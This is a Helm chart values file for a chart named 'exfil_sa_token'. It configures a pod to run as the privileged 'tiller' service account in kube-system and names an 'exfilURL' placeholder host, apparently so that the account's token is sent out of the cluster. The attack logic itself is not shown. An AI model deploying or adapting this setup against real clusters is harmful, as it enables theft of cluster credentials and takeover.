# Default values for exfil_sa_token.
# This is a YAML-formatted file.
# Declare variables to be passed into your templates.

restartPolicy: Never
serviceAccountName: tiller
namespace: kube-system
exfilURL: https://example.com